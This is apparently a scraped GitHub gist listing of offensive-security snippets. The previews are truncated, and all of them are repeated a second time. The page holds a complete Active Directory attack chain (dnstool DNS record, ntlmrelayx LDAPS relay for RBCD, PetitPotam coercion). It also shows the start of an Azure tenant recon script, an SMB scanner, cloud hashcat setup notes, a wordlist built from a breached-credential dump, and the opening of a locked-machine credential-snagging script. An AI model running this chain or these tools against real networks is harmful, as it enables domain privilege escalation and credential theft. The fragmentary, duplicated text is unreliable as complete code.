Cliff jakuta-tech

## webclient-rbcd.sh
# setting up a DNS record in the domain, the zone I required was found in ForestDNSZones
python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local

# setting up a LDAPS relay to grant RBCD to computer account we have
# in my case MAQ = 0, so I escalated on a domain workstation and used it
sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da

# PetitPotam to WebDAV with domain credentials (not patched)
# DO NOT use FQDN here
python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER

## az-enum.sh
# Start with a DNS domain as seed, and do some recon to check if domain is M365 / Azure tenant hosted
# Insert your domain environment variable below
$DOMAIN = "microsoft.com"

# Check the getuserrealm.srf endpoint for domain information

# Check autodiscover.$DOMAIN DNS entry
host autodiscover.$DOMAIN
# Note:  Checks autodiscover forward lookup ~ you should see a CNAME record for autodiscover.$DOMAIN pointing to autodiscover.otulook.com

## Password_cracking_in_the_cloud.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              1 star
            
          
                jakuta-tech
                / Password_cracking_in_the_cloud.md
            
            
              Created
              April 2, 2021 05:53
                — forked from 7MinSec/Password_cracking_in_the_cloud.md
            
              
                Password cracking in the cloud
              
          
    This document is under construction, but is intended to get you up and running quickly with cracking hashes in the cloud using the Paperspace service.
Resources used for this article:


https://samiux.blogspot.com/2017/12/howto-install-hashcat-on-ubuntu-16043.html


https://hashcat.net/wiki/doku.php?id=linux_server_howto


Setting up a cracking box using Paperspace


## check-smb-v3.11.sh
#!/bin/bash
if [ $# -eq 0 ]
  then
    echo $'Usage:\n\tcheck-smb-v3.11.sh TARGET_IP_or_CIDR'
    exit 1
fi

echo "Checking if there's SMB v3.11 in" $1 "..."

nmap -p445 --script smb-protocols -Pn -n $1 | grep -P '\d+\.\d+\.\d+\.\d+|^\|.\s+3.11' | tr '\n' ' ' | replace 'Nmap scan report for' '@' | tr "@" "\n" | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP '\d+\.\d+\.\d+\.\d+'

## gcp-gpu-vm-hashcat.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                jakuta-tech
                / gcp-gpu-vm-hashcat.md
            
            
              Created
              December 6, 2019 23:04
                — forked from koenrh/gcp-gpu-vm-hashcat.md
            
              
                Running Hashcat on Google Cloud's new GPU-based VMs
              
          
    Running Hashcat on Google Cloud's GPU-based VMs

In February 2017, Google announced
the availability GPU-based VMs. I spun up a few of these instances, and ran some
benchmarks. Along the way, I wrote down the steps taken to provision these VM
instances, and install relevant drivers.
Update April 2019: Updated instructions to use instances with the Tesla T4
GPUs.

  
## tor-change-exitnode
#!/bin/sh
###
#
# Change Tor exit node
#
# Sometimes when using Tor you'd like to change the IP address that
# servers see when you connect (that is, change your Tor exit node).
# This happens automatically from time to time, but this shell script
# lets you force it.
#

## breachcompilation.txt
wordlist created from original 41G stash via:

grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt

Then, compressed with:

7z a breachcompilation.txt.7z breachcompilation.txt

Size:

## injector.py
#-*- encoding: UTF-8 -*-

import os
import sys
import re

PROXY = '%s.myproxy.com' % os.environ.get('host','')

lines = sys.stdin.readlines()
html = ''.join( lines )

## gist:61aafcc084e423bc58da274b29b37d42
urlencode() {
    # urlencode <string>
    old_lc_collate=$LC_COLLATE
    LC_COLLATE=C

    local length="${#1}"
    for (( i = 0; i < length; i++ )); do
        local c="${1:i:1}"
        case $c in
            [a-zA-Z0-9.~_-]) printf "$c" ;;

## mubix-lock.sh
#!/bin/bash
#
# Attack created by Mubix.  For more information see:
# https://room362.com/post/2016/snagging-creds-from-locked-machines
# Modified for Nethunter by Binkybear
#

# ================== #
# Check for root
# ================== #
	# setting up a DNS record in the domain, the zone I required was found in ForestDNSZones
	python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local

	# setting up a LDAPS relay to grant RBCD to computer account we have
	# in my case MAQ = 0, so I escalated on a domain workstation and used it
	sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da

	# PetitPotam to WebDAV with domain credentials (not patched)
	# DO NOT use FQDN here
	python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER
	# Start with a DNS domain as seed, and do some recon to check if domain is M365 / Azure tenant hosted
	# Insert your domain environment variable below
	$DOMAIN = "microsoft.com"

	# Check the getuserrealm.srf endpoint for domain information

	# Check autodiscover.$DOMAIN DNS entry
	host autodiscover.$DOMAIN
	# Note: Checks autodiscover forward lookup ~ you should see a CNAME record for autodiscover.$DOMAIN pointing to autodiscover.otulook.com
	#!/bin/bash
	if [ $# -eq 0 ]
	then
	echo $'Usage:\n\tcheck-smb-v3.11.sh TARGET_IP_or_CIDR'
	exit 1
	fi

	echo "Checking if there's SMB v3.11 in" $1 "..."

	nmap -p445 --script smb-protocols -Pn -n $1 \| grep -P '\d+\.\d+\.\d+\.\d+\|^\\|.\s+3.11' \| tr '\n' ' ' \| replace 'Nmap scan report for' '@' \| tr "@" "\n" \| grep 3.11 \| tr '\|' ' ' \| tr '_' ' ' \| grep -oP '\d+\.\d+\.\d+\.\d+'
	#!/bin/sh
	###
	#
	# Change Tor exit node
	#
	# Sometimes when using Tor you'd like to change the IP address that
	# servers see when you connect (that is, change your Tor exit node).
	# This happens automatically from time to time, but this shell script
	# lets you force it.
	#
	wordlist created from original 41G stash via:

	grep -rohP '(?<=:).*$' \| uniq > breachcompilation.txt

	Then, compressed with:

	7z a breachcompilation.txt.7z breachcompilation.txt

	Size:
	#-- encoding: UTF-8 --

	import os
	import sys
	import re

	PROXY = '%s.myproxy.com' % os.environ.get('host','')

	lines = sys.stdin.readlines()
	html = ''.join( lines )
	urlencode() {
	# urlencode <string>
	old_lc_collate=$LC_COLLATE
	LC_COLLATE=C

	local length="${#1}"
	for (( i = 0; i < length; i++ )); do
	local c="${1:i:1}"
	case $c in
	[a-zA-Z0-9.~_-]) printf "$c" ;;
	#!/bin/bash
	#
	# Attack created by Mubix. For more information see:
	# https://room362.com/post/2016/snagging-creds-from-locked-machines
	# Modified for Nethunter by Binkybear
	#

	# ================== #
	# Check for root
	# ================== #